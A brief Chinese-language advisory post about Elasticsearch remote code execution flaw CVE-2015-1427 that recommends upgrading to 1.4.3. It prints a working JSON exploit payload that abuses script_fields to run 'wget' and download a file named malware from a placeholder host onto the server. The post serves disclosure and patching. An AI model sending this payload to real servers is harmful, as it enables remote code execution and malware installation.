ElasticSearch 远程代码执行漏洞 CVE-2015-1427

ElasticSearch 提供了一个扩展 JSON API ,提供搜索以及系统管理的功能。该 API 日前爆出编号为 CVE-2015-1427 的远程代码执行漏洞,该漏洞源于一篇博客的介绍,请看 here (translated).

可通过升级到 1.4.3 或者更新版本来修复这个漏洞。否则如果你的 ElasticSearch 暴露在互联网就可能通过如下代码来执行远程代码:

{"query":
    {"filtered": {
        "query": {"match_all": {}}}},
        "script_fields": {"exp": {
            "script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/malware http://x.x.x.x/malware \").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"
    }}}

关于该漏洞的详细介绍和原理请看此文

ElasticSearch 的详细介绍:请点这里
ElasticSearch 的下载地址:请点这里

相关推荐